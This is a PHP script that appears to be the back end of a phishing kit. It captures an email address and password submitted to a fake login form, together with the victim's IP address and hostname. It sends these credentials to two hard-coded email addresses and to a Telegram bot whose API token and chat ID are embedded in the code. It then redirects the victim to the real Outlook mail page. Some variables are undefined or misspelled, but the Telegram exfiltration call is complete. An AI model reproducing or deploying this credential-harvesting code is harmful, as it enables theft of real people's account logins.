<?php

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message  = "==================+ Spam ReZulT +==================\n";
$message .= "E-mail Address: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['Password']."\n";

$message .= "===================+By tare_ama +===========\n";
$message .= "Client IP : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$message .= "=============+ Created in 2014 By tare_ama +=============\n";
$rnessage = "$message\n";
$send= "coldfire0074@gmail.com,kanejeanna@yandex.com";
$subject = "yahoo | Login | $ip";
$headers = "From: pentest";
//telgram rzlt
$api = "7521633762:AAG_JABrkHJQfxLEx96xzDHwZni7LWOvnuU";
$chatid = "5120032304";
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );
	 if (mail($recipient,$subject,$message,$headers))

$str=array($send, $IWP); foreach ($str as $send)
if(mail($send,$subject,$rnessage,$headers) != false){
mail($Send,$subject,$rnessage,$headers);

}
header("Location: https://outlook.office.com/mail/");
?>